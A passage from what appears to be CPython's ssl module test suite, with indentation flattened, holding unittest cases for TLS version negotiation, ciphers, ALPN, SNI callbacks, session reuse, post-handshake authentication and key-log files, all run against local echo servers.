server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = server_ctx.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = client_ctx.wrap_socket(
socket.socket(), server_hostname=hostname
)
client.connect((hostname, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.3')
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
client_context, server_context, hostname = testing_context()
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_tls_version('TLSv1_1')
@ignore_deprecation
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
client_context, server_context, hostname = testing_context()
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
with self.assertRaises(ssl.SSLError):
server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_npn_protocols(self):
assert not ssl.HAS_NPN
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(os_helper.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with open(os_helper.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
def msg_cb(conn, direction, version, content_type, msg_type, data):
if support.verbose and content_type == _TLSContentType.ALERT:
info = (conn, direction, version, content_type, msg_type, data)
sys.stdout.write(f"TLS: {info!r}\n")
server_context._msg_callback = msg_cb
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
with self.assertRaisesRegex(
ssl.SSLError,
'tlsv13 alert certificate required'
):
# receive CertificateRequest
self.assertEqual(s.recv(1024), b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=os_helper.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(os_helper.TESTFN))
ctx.keylog_filename = os_helper.TESTFN
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
self.assertTrue(os.path.isfile(os_helper.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(os_helper.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = os_helper.TESTFN
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = os_helper.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_TLSv1_3
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_msg_callback_deadlock_bpo43577(self):
client_context, server_context, hostname = testing_context()
server_context2 = testing_context()[1]
